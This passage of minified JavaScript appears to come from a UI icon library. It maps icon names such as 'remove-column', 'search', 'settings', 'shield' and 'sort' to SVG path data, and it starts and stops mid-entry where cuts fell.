1 1h10c.55 0 1-.45 1-1s-.45-1-1-1z"],"remove-column":["M19 0H5c-.55 0-1 .45-1 1v4h2V2h5v16H6v-3H4v4c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18h-5V2h5v16zM6.29 13.71a1.003 1.003 0 0 0 1.42-1.42L5.41 10 7.7 7.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L4 8.59l-2.29-2.3A1.003 1.003 0 0 0 .29 7.71L2.59 10 .3 12.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L4 11.41l2.29 2.3z"],"remove-column-left":["M4 11h6c.55 0 1-.45 1-1s-.45-1-1-1H4c-.55 0-1 .45-1 1s.45 1 1 1zM19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-7 18H2V2h10v16zm6 0h-5V2h5v16z"],"remove-column-right":["M19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM7 18H2V2h5v16zm11 0H8V2h10v16zm-8-7h6c.55 0 1-.45 1-1s-.45-1-1-1h-6c-.55 0-1 .45-1 1s.45 1 1 1z"],"remove-row-bottom":["M7 14h6c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1s.45 1 1 1zM19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2V8h16v10zm0-11H2V2h16v5z"],"remove-row-top":["M7 8h6c.55 0 1-.45 1-1s-.45-1-1-1H7c-.55 0-1 .45-1 1s.45 1 1 1zm12-8H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2v-5h16v5zm0-6H2V2h16v10z"],repeat:["M14 6c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1s-1 .45-1 1v2.05C16.18 1.6 13.29 0 10 0 4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10c0-.55-.45-1-1-1s-1 .45-1 1c0 4.42-3.58 8-8 8s-8-3.58-8-8 3.58-8 8-8c2.53 0 4.77 1.17 6.24 3H15c-.55 0-1 .45-1 1z"],resolve:["M8.7 4.7C7.9 4.2 7 4 6 4c-3.3 0-6 2.7-6 6s2.7 6 6 6c1 0 1.9-.2 2.7-.7C7.3 14 6.5 12.1 6.5 10s.9-4 2.2-5.3zM14 4c-1 0-1.9.2-2.7.7 1.4 1.4 2.2 3.2 2.2 5.3s-.9 4-2.2 5.3c.8.5 1.7.7 2.7.7 3.3 0 6-2.7 6-6s-2.7-6-6-6zm-4 1.5C8.8 6.7 8 8.2 8 10s.8 3.3 2 4.4c1.2-1.1 2-2.7 2-4.5s-.8-3.3-2-4.4z"],rig:["M7 4.2C7 5.75 8.34 7 10 7s3-1.46 3-2.8C13 1.45 10.94 0 10 0H6c0 2.74 3.76 1.96 1 4.2zm11.71 14.09L13 12.59V9.01c0-.55-.45-1-1-1H8c-.55 0-1 .45-1 1v3.58l-5.71 5.7a1.003 1.003 0 0 0 1.42 1.42L7 15.42V19c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-3.58l4.29 4.29a1.003 1.003 0 0 0 1.42-1.42zM10.21 8c.01 0 .01.01 0 0 .01.01.01 0 0 0z"],"right-join":["M8.7 4.7C7.4 6 6.5 7.9 6.5 10s.8 4 2.2 5.3c-.8.5-1.7.7-2.7.7-3.3 0-6-2.7-6-6s2.7-6 6-6c1 0 1.9.2 2.7.7zm-3.34 9.25c-.55-1.2-.86-2.54-.86-3.95s.31-2.75.86-3.95a4.001 4.001 0 0 0 0 7.9zM14 4c3.3 0 6 2.7 6 6s-2.7 6-6 6c-1 0-1.9-.2-2.7-.7 1.3-1.3 2.2-3.2 2.2-5.3s-.8-3.9-2.2-5.3C12.1 4.2 13 4 14 4zm-4 1.5C8.8 6.7 8 8.2 8 10s.8 3.3 2 4.4c1.2-1.1 2-2.7 2-4.5s-.8-3.3-2-4.4z"],ring:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 15c-2.76 0-5-2.24-5-5s2.24-5 5-5 5 2.24 5 5-2.24 5-5 5z"],"rotate-document":["M8.71 6.29A.997.997 0 0 0 8 6H3c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h9c.55 0 1-.45 1-1v-8c0-.28-.11-.53-.29-.71l-4-4zM11 18H4V8h3v3c0 .55.45 1 1 1h3v6zm3-16h-1.59l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C9.11 2.47 9 2.72 9 3c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H14c1.1 0 2 .9 2 2v3c0 .55.45 1 1 1s1-.45 1-1V6c0-2.21-1.79-4-4-4z"],"rotate-page":["M14 2h-1.59l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C9.11 2.47 9 2.72 9 3c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H14c1.1 0 2 .9 2 2v3c0 .55.45 1 1 1s1-.45 1-1V6c0-2.21-1.79-4-4-4zm-2 5H3c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-1 11H4V9h7v9z"],satellite:["M9 18c.6 0 1 .4 1 1s-.4 1-1 1c-5 0-9-4-9-9 0-.6.4-1 1-1s1 .4 1 1c0 3.9 3.1 7 7 7zm0-4c.6 0 1 .4 1 1s-.4 1-1 1c-2.8 0-5-2.2-5-5 0-.6.4-1 1-1s1 .4 1 1c0 1.7 1.3 3 3 3zm5.7-3.7c.4-.4 1-.4 1.4 0l3.6 3.6c.4.4.4 1 0 1.4l-1.4 1.4c-.4.4-1 .4-1.4 0l-3.6-3.6c-.4-.4-.4-1 0-1.4l1.4-1.4zM4.7.3c.4-.4 1-.4 1.4 0l3.6 3.6c.4.4.4 1 0 1.4L8.3 6.7c-.4.4-1 .4-1.4 0L3.3 3.1c-.4-.4-.4-1 0-1.4L4.7.3zm11.1 1c.4-.4 1-.4 1.4 0l1.6 1.6c.4.4.4 1 0 1.4l-6.5 6.5c-.4.4-1 .4-1.4 0L9.3 9.2c-.4-.4-.4-1 0-1.4l6.5-6.5zM9 12c-.6 0-1-.4-1-1s.4-1 1-1 1 .4 1 1-.4 1-1 1z"],saved:["M12 0H4c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V6l-6-6zm4 18H5V2h6v5h5v11zm-8.29-6.71a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29.32 0 .59-.16.77-.38l.01.01 4-5-.01-.01c.14-.18.23-.38.23-.62 0-.55-.45-1-1-1-.32 0-.59.16-.77.38l-.01-.01-3.3 4.13-2.21-2.21z"],"scatter-plot":["M9 9c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm5 2c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm4-5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm1 10H2V3c0-.55-.45-1-1-1s-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zM5 15c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"],search:["M19.56 17.44l-4.94-4.94A8.004 8.004 0 0 0 16 8c0-4.42-3.58-8-8-8S0 3.58 0 8s3.58 8 8 8c1.67 0 3.21-.51 4.5-1.38l4.94 4.94a1.498 1.498 0 1 0 2.12-2.12zM8 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.69 6-6 6z"],"search-around":["M9.9 6.9a3 3 0 1 0 0 6 3 3 0 1 0 0-6zM3 14c-1.7 0-3 1.3-3 3s1.3 3 3 3 3-1.3 3-3-1.3-3-3-3zm0 5c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zM3 0C1.3 0 0 1.3 0 3s1.3 3 3 3 3-1.3 3-3-1.3-3-3-3zm0 5c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zM17 14c-1.7 0-3 1.3-3 3s1.3 3 3 3 3-1.3 3-3-1.3-3-3-3zm0 5c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zM17 0c-1.7 0-3 1.3-3 3s1.3 3 3 3 3-1.3 3-3-1.3-3-3-3zm0 5c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zM10 10L5 5","M5.379 4.671l5.02 5.02-.707.708-5.02-5.02zM10 10l5-5","M14.621 4.671l.707.708-5.02 5.02-.707-.707z","M10 10l5 5M10.379 9.671l5.02 5.02-.707.708-5.02-5.02z","M10 10l-5 5M9.621 9.671l.707.708-5.02 5.02-.707-.707z"],"search-template":["M13 8H5c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1zm0 3H5c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1zm0-6H5c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1zm6.56 12.44l-3.23-3.23A8.939 8.939 0 0 0 18 9a9 9 0 1 0-9 9c1.94 0 3.74-.62 5.21-1.67l3.23 3.23a1.498 1.498 0 1 0 2.12-2.12zM9 16c-3.87 0-7-3.13-7-7s3.13-7 7-7 7 3.13 7 7-3.13 7-7 7z"],"search-text":["M19.56 17.44l-3.23-3.23A8.939 8.939 0 0 0 18 9a9 9 0 1 0-9 9c1.94 0 3.74-.62 5.21-1.67l3.23 3.23a1.498 1.498 0 1 0 2.12-2.12zM9 16c-3.87 0-7-3.13-7-7s3.13-7 7-7 7 3.13 7 7-3.13 7-7 7zm3.5-11h-7c-.28 0-.5.22-.5.5v2c0 .28.22.5.5.5s.5-.22.5-.5V7h2v6h-.5c-.28 0-.5.22-.5.5s.22.5.5.5h3c.28 0 .5-.22.5-.5s-.22-.5-.5-.5H10V7h2v.5c0 .28.22.5.5.5s.5-.22.5-.5v-2c0-.28-.22-.5-.5-.5z"],"segmented-control":["M19 5H1c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-1 8h-8V7h8v6z"],select:["M19.71 18.29l-4.25-4.25L20 12.91 9.93 9.33c.04-.1.07-.21.07-.33V3c0-.55-.45-1-1-1H4V1c0-.55-.45-1-1-1S2 .45 2 1v1H1c-.55 0-1 .45-1 1s.45 1 1 1h1v5c0 .55.45 1 1 1h6c.12 0 .23-.03.34-.07L12.91 20l1.14-4.54 4.25 4.25c.17.18.42.29.7.29a1.003 1.003 0 0 0 .71-1.71zM8 8H4V4h4v4z"],selection:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z","M10 6a4 4 0 1 0 0 8 4 4 0 1 0 0-8z"],"send-to":["M19 0h-5c-.6 0-1 .4-1 1s.4 1 1 1h2.6l-4.3 4.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3L18 3.4V6c0 .5.5 1 1 1s1-.5 1-1V1c0-.6-.5-1-1-1zm0 9c-1 0-1.9-.5-2.5-1.3l-1.4 1.4c-.5.6-1.3.9-2.1.9-1.7 0-3-1.3-3-3 0-.8.3-1.6.9-2.1l1.4-1.4C11.5 2.9 11 2 11 1c0-.3.1-.6.2-.9-.4-.1-.8-.1-1.2-.1C4.5 0 0 4.5 0 10s4.5 10 10 10 10-4.5 10-10c0-.4 0-.8-.1-1.2-.3.1-.6.2-.9.2z"],"send-to-graph":["M8 11H3c-.55 0-1 .45-1 1s.45 1 1 1h2.59L.3 18.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L7 14.41V17c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1zm10 2c-.53 0-1.01.21-1.37.55L11.9 10.6c.06-.19.1-.39.1-.6 0-.21-.04-.41-.1-.6l4.72-2.95c.37.34.85.55 1.38.55 1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2c0 .21.04.41.1.6l-4.73 2.96c-.24-.23-.54-.4-.87-.48V3.93c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S8 .9 8 2c0 .93.64 1.71 1.5 1.93v4.14c-.33.09-.63.26-.87.48L7.6 7.91 5.42 6.55 3.9 5.6c.06-.19.1-.39.1-.6 0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.53 0 1.01-.21 1.37-.55L9 9.96V10h.06L12 11.84l.4.25 1.51.94 2.19 1.37c-.06.19-.1.39-.1.6 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2zm-7-2.96l-.06-.04H11v.04z"],"send-to-map":["M8 11H3c-.55 0-1 .45-1 1s.45 1 1 1h2.59L.3 18.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L7 14.41V17c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1zm11.54-6.82l.01-.02-6-4-.01.02C13.39.08 13.21 0 13 0s-.39.08-.54.18l-.01-.02L7 3.8 1.55.17l-.01.01A.969.969 0 0 0 1 0C.45 0 0 .45 0 1v9c0-.55.45-1 1-1h1V2.87l4 2.67V9h2V5.54l4-2.67v11.6l-1 .67v2.4l2-1.33 5.45 3.63.01-.02c.15.1.33.18.54.18.55 0 1-.45 1-1V5c0-.35-.19-.64-.46-.82zM18 17.13l-4-2.67V2.87l4 2.67v11.59z"],"series-add":["M13.29 9.29c.3.62.8 1.12 1.42 1.42l-3 3c-.18.18-.43.29-.71.29s-.53-.11-.71-.3L7 10.41l-5 5V17h17c.55 0 1 .45 1 1s-.45 1-1 1H1a.998.998 0 0 1-1-1V4c0-.55.45-1 1-1s1 .45 1 1v8.59l4.29-4.3C6.47 8.11 6.72 8 7 8s.53.11.71.29l3.29 3.3 2.29-2.3zM12 5c0-.5.4-1 1-1h2V2c0-.6.4-1 1-1 .5 0 1 .4 1 1v2h2c.5 0 1 .4 1 1s-.5 1-1 1h-2v2c0 .6-.5 1-1 1-.6 0-1-.4-1-1V6h-2c-.6 0-1-.4-1-1z"],"series-configuration":["M11.91 10.67c.52.45 1.13.8 1.8 1.03l-2.01 2.01c-.18.18-.43.29-.71.29-.28 0-.53-.11-.71-.3L7 10.41l-5 5V17h16.99c.55 0 1 .45 1 1s-.45 1-1 1H1a.998.998 0 0 1-1-1V4c0-.55.45-1 1-1s1 .45 1 1v8.59l4.29-4.3C6.47 8.11 6.72 8 7 8c.28 0 .53.11.71.29l3.29 3.3.91-.92zM18.5 4.6h1.04c.25 0 .45.2.46.44v.9c0 .25-.2.45-.45.45h-1.04c-.07.22-.16.42-.27.62l.73.73c.17.17.17.44 0 .61l-.61.61c-.17.17-.44.17-.61 0l-.73-.73c-.2.11-.4.2-.62.26v1.05c0 .25-.2.45-.45.45h-.9c-.25 0-.45-.2-.45-.45V8.51c-.21-.06-.4-.15-.58-.25l-.76.77c-.17.17-.46.17-.64 0l-.64-.64a.465.465 0 0 1 0-.64l.76-.77c-.1-.19-.19-.38-.25-.59h-1.04c-.25 0-.45-.2-.45-.45v-.9c0-.25.2-.45.45-.45h1.04c.07-.22.16-.42.27-.61l-.73-.73a.429.429 0 0 1 0-.61l.61-.61c.17-.17.44-.17.61 0l.73.73c.2-.11.4-.2.62-.26V1.45a.44.44 0 0 1 .44-.45h.9c.25 0 .45.2.45.45V2.5c.21.06.4.15.58.25l.76-.77c.17-.17.46-.17.64 0l.64.64c.17.17.17.46 0 .64l-.76.77c.1.17.19.36.25.57zm-4.69.9c0 .93.75 1.69 1.69 1.69.93 0 1.69-.75 1.69-1.69s-.75-1.69-1.69-1.69-1.69.76-1.69 1.69z"],"series-derived":["M18.82 6.58c-.03.05-.07.09-.11.13 0 0 0-.01-.01-.01l-2 2c-.2.2-.4.3-.7.3-.6 0-1-.4-1-1 0-.3.1-.5.3-.7L16.6 6H11c-.6 0-1-.4-1-1s.4-1 1-1h5.6l-1.3-1.3c-.2-.2-.3-.4-.3-.7 0-.6.4-1 1-1 .3 0 .5.1.7.3l3 3c.2.2.3.4.3.7s-.1.5-.3.7l-.88.88zm-5.53 2.71c.3.62.8 1.12 1.42 1.42l-3 3c-.18.18-.43.29-.71.29s-.53-.11-.71-.3L7 10.41l-5 5V17h17c.55 0 1 .45 1 1s-.45 1-1 1H1a.998.998 0 0 1-1-1V4c0-.55.45-1 1-1s1 .45 1 1v8.59l4.29-4.3C6.47 8.11 6.72 8 7 8s.53.11.71.29l3.29 3.3 2.29-2.3z"],"series-filtered":["M12.14 10.45c.21.67.65 1.23 1.22 1.61l-1.65 1.65c-.18.18-.43.29-.71.29s-.53-.11-.71-.3L7 10.41l-5 5V17h17c.55 0 1 .45 1 1s-.45 1-1 1H1a.998.998 0 0 1-1-1V4c0-.55.45-1 1-1s1 .45 1 1v8.59l4.29-4.3C6.47 8.11 6.72 8 7 8s.53.11.71.29l3.29 3.3 1.14-1.14zM19.35 1a.642.642 0 1 1 .46 1.1l-3.03 3.03v2.95c0 .18-.07.34-.19.46l-1.28 1.29c-.11.1-.27.17-.45.17-.35 0-.64-.29-.64-.64V5.13L11.19 2.1a.642.642 0 0 1 .45-1.1h7.71z"],"series-search":["M11.28 11.31l-.28.28-3.29-3.3C7.53 8.11 7.28 8 7 8s-.53.11-.71.29L2 12.59V4c0-.55-.45-1-1-1s-1 .45-1 1v14a.998.998 0 0 0 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1H2v-1.59l5-5 3.29 3.29c.18.19.43.3.71.3s.53-.11.71-.29l2.09-2.09c-.17.02-.34.02-.51.02-.7 0-1.38-.12-2.01-.33zm-.93-6c0-1.62 1.31-2.93 2.93-2.93s2.93 1.31 2.93 2.93-1.31 2.93-2.93 2.93-2.93-1.31-2.93-2.93zm6.47 2.43c.11-.17.21-.33.29-.51.01-.03.03-.06.04-.09.08-.18.16-.35.21-.54.06-.2.1-.38.14-.58.01-.05.01-.09.02-.14.03-.2.05-.39.05-.6 0-2.37-1.93-4.3-4.3-4.3-2.37.01-4.3 1.93-4.3 4.31s1.93 4.3 4.3 4.3c.21 0 .4-.02.6-.05.04 0 .09-.01.14-.02.2-.03.38-.08.57-.14.2-.06.37-.14.55-.21.03-.01.06-.03.09-.04.18-.09.34-.19.51-.29l2.87 2.87c.14.14.33.22.56.22.43 0 .78-.35.78-.78a.938.938 0 0 0-.23-.56l-2.89-2.85z"],settings:["M4 1c0-.55-.45-1-1-1S2 .45 2 1v5h2V1zM2 19c0 .55.45 1 1 1s1-.45 1-1v-6H2v6zm9-18c0-.55-.45-1-1-1S9 .45 9 1v8h2V1zm7 0c0-.55-.45-1-1-1s-1 .45-1 1v3h2V1zM9 19c0 .55.45 1 1 1s1-.45 1-1v-3H9v3zm9-14h-2c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-2 14c0 .55.45 1 1 1s1-.45 1-1v-8h-2v8zM4 7H2c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm7 3H9c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1z"],share:["M15 18H2V5h8.76l2-2H1c-.55 0-1 .45-1 1v15c0 .55.45 1 1 1h15c.55 0 1-.45 1-1V7.24l-2 2V18zm4-18h-7c-.55 0-1 .45-1 1s.45 1 1 1h4.59l-7.3 7.29a1.003 1.003 0 0 0 1.42 1.42L18 3.41V8c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],shield:["M10 20c6-3.81 9-9.048 9-15.714-2 0-5-1.429-9-4.286-4 2.857-7 4.286-9 4.286C1 10.952 4 16.19 10 20zm0-17.348c2.577 1.734 4.776 2.88 6.667 3.419-.44 4.627-2.636 8.353-6.667 11.297V2.652z"],shop:["M17.94 3.63c-.01-.02-.01-.03-.02-.04l-.03-.09h-.01c-.18-.3-.49-.5-.86-.5h-14c-.42 0-.77.25-.92.61L0 8.5h.02a2.5 2.5 0 0 0 5 0 2.5 2.5 0 0 0 5 0 2.5 2.5 0 0 0 5 0 2.5 2.5 0 0 0 5 0l-2.08-4.87zM3.02 2h14c.55 0 1-.45 1-1s-.45-1-1-1h-14c-.55 0-1 .45-1 1s.44 1 1 1zm13 14h-12v-4h-2v7c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-7h-2v4z"],"shopping-cart":["M18 14H8.72l-.67-2H17c.44 0 .8-.29.94-.69h.01l2-6h-.01c.03-.1.06-.2.06-.31 0-.55-.45-1-1-1H5.39l-.44-1.32h-.01C4.8 2.29 4.44 2 4 2H1c-.55 0-1 .45-1 1s.45 1 1 1h2.28l3.33 10H5c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2h9c0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2zM6.05 6h11.56l-1.33 4H7.39L6.05 6z"],"sim-card":["M16.71 5.29l-5-5A.997.997 0 0 0 11 0H4c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h12c.55 0 1-.45 1-1V6c0-.28-.11-.53-.29-.71zM9 7h2v3H9V7zM6 7h2v3H6V7zm2 11H6v-3h2v3zm3 0H9v-3h2v3zm3 0h-2v-3h2v3zm0-4H6v-3h8v3zm0-4h-2V7h2v3z"],slash:["M12 2c-.46 0-.85.32-.97.74L7.04 16.7c-.02.1-.04.2-.04.3 0 .55.45 1 1 1 .46 0 .85-.32.97-.74L12.96 3.3c.02-.1.04-.2.04-.3 0-.55-.45-1-1-1z"],"small-cross":["M11.41 10l3.29-3.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L10 8.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42L8.59 10 5.3 13.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3.29-3.3 3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L11.41 10z"],"small-minus":["M14 9H6c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1z"],"small-plus":["M14 9h-3V6c0-.55-.45-1-1-1s-1 .45-1 1v3H6c-.55 0-1 .45-1 1s.45 1 1 1h3v3c0 .55.45 1 1 1s1-.45 1-1v-3h3c.55 0 1-.45 1-1s-.45-1-1-1z"],"small-tick":["M15 5c-.28 0-.53.11-.71.29L8 11.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l7-7A1.003 1.003 0 0 0 15 5z"],snowflake:["M11 11.776v2.81l2.31 2.242a.987.987 0 0 1 0 1.415c-.399.39-1.044.39-1.442 0L11 17.414V19a.99.99 0 0 1-.996 1A.996.996 0 0 1 9 19v-1.636l-.912.879c-.398.39-1.043.39-1.441 0a.987.987 0 0 1 0-1.415L9 14.536v-2.79l-2.548 1.435-.837 3.063c-.146.534-.705.85-1.248.707a.998.998 0 0 1-.721-1.224l.309-1.132-1.4.793a1.03 1.03 0 0 1-1.393-.366.99.99 0 0 1 .373-1.366l1.445-.818-1.224-.322a.998.998 0 0 1-.72-1.225c.145-.533.704-.85 1.248-.707l3.193.84 2.462-1.395-2.532-1.434-3.123.82a1.022 1.022 0 0 1-1.249-.706.998.998 0 0 1 .721-1.225L2.91 7.18l-1.4-.793a.99.99 0 0 1-.373-1.366 1.03 1.03 0 0 1 1.392-.366l1.445.818-.328-1.2a.998.998 0 0 1 .72-1.225 1.022 1.022 0 0 1 1.25.707l.855 3.132L9 8.311V5.414L6.647 3.121a.987.987 0 0 1 0-1.414 1.033 1.033 0 0 1 1.441 0L9 2.586V1c0-.552.44-1 1.004-1A.99.99 0 0 1 11 1l-.007 1.536.875-.829a1.033 1.033 0 0 1 1.441 0 .987.987 0 0 1 0 1.414L11 5.364v2.918l2.53-1.42.855-3.131c.146-.534.705-.85 1.249-.707a.998.998 0 0 1 .72 1.224l-.327 1.2 1.4-.792a1.03 1.03 0 0 1 1.392.366.99.99 0 0 1-.373 1.366l-1.355.768 1.153.303a.998.998 0 0 1 .721 1.225c-.146.533-.705.85-1.249.707l-3.123-.821-2.576 1.459 2.506 1.42 3.193-.84a1.022 1.022 0 0 1 1.249.707.998.998 0 0 1-.72 1.225l-1.224.322 1.4.793a.99.99 0 0 1 .373 1.366 1.03 1.03 0 0 1-1.393.366l-1.356-.768.31 1.132a.998.998 0 0 1-.721 1.224 1.022 1.022 0 0 1-1.249-.707l-.837-3.063L11 11.776z"],"social-media":["M11.5 5c.8 0 1.6-.4 2-1 2 1.2 3.3 3.3 3.5 5.7 0 .5.5.9 1 .9.6 0 1-.5 1-1v-.1c-.2-3.3-2.2-6.2-5.1-7.6C13.7.8 12.7 0 11.5 0 10.1 0 9 1.1 9 2.5S10.1 5 11.5 5zm5 7c-1.4 0-2.5 1.1-2.5 2.5 0 .4.1.7.2 1.1-1.1.9-2.6 1.4-4.2 1.4-1.9 0-3.6-.8-4.9-2-.2-.2-.5-.4-.8-.4-.5 0-1 .5-1 1 0 .3.1.5.3.7C5.3 18 7.5 19 10 19c2.2 0 4.2-.8 5.8-2.1.2.1.5.1.7.1 1.4 0 2.5-1.1 2.5-2.5S17.9 12 16.5 12zM5 10.5c0-1.1-.7-2.1-1.7-2.4.5-1.9 1.9-3.5 3.6-4.4.3-.2.6-.5.6-.9 0-.5-.4-1-1-1-.2 0-.4.1-.6.2-2.4 1.2-4.2 3.6-4.7 6.4C.5 8.9 0 9.6 0 10.5 0 11.9 1.1 13 2.5 13S5 11.9 5 10.5z"],sort:["M19 16h-9c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm0-5h-9c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zM7 15c-.28 0-.53.11-.71.29L5 16.59V11c0-.55-.45-1-1-1s-1 .45-1 1v5.59L1.71 15.3A.965.965 0 0 0 1 15a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 7 15zM19 1h-9c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zm0 5h-9c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1z"],"sort-alphabetical":["M8 15c-.28 0-.53.11-.71.29L6 16.59v-5.58c0-.55-.45-1-1-1s-1 .45-1 1v5.58L2.71 15.3c-.18-.18-.43-.3-.71-.3a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 8 15zm8.89-.79v-1.22H11.3v1.3h3.51L11 18.78V20h5.99v-1.3h-3.91l3.81-4.49zM14.97 0h-1.95L9.01 11.01h1.89l.98-2.92h4.17l.98 2.92h1.96L14.97 0zm-2.59 6.63l1.58-4.74H14l1.57 4.74h-3.19z"],"sort-alphabetical-desc":["M8.01 15c-.28 0-.53.11-.71.29L6 16.59v-5.58c0-.55-.45-1-1-1s-1 .45-1 1v5.58L2.71 15.3c-.18-.18-.43-.3-.71-.3a1.003 1.003 0 0 0-.71 1.71l3 3a1.014 1.014 0 0 0 1.42 0l3-3c.18-.18.29-.43.29-.71.01-.55-.44-1-.99-1zm4.44-5.65l6.4-7.88V0H10.5v1.67h5.91L10 9.44v1.57h9V9.35h-6.55zm1.27 3.64L11 20h1.59l.56-1.56h2.68l.55 1.56h1.64l-2.68-7.01h-1.62zm-.16 4.3l.93-2.57h.02l.9 2.57h-1.85z"],"sort-asc":["M10 8h5c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1h-5c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm0 5h7c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1h-7c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm0-10h3c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1h-3c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm9 12h-9c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zM7 14c-.28 0-.53.11-.71.29L5 15.59V10c0-.55-.45-1-1-1s-1 .45-1 1v5.59L1.71 14.3A.965.965 0 0 0 1 14a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 7 14z"],"sort-desc":["M13 15h-3c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm-6-1c-.28 0-.53.11-.71.29L5 15.59V10c0-.55-.45-1-1-1s-1 .45-1 1v5.59L1.71 14.3A.965.965 0 0 0 1 14a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3A1.003 1.003 0 0 0 7 14zM19 0h-9c-.55 0-1 